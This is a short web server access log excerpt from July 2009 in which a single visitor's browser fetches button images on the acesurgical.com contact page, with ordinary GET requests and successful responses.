58.27.156.10 - - [01/Jul/2009:00:44:20 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; Seekmo 10.3.85.0)"
58.27.156.10 - - [01/Jul/2009:00:44:20 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; Seekmo 10.3.85.0)"
58.27.156.10 - - [01/Jul/2009:00:44:22 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; Seekmo 10.3.85.0)"
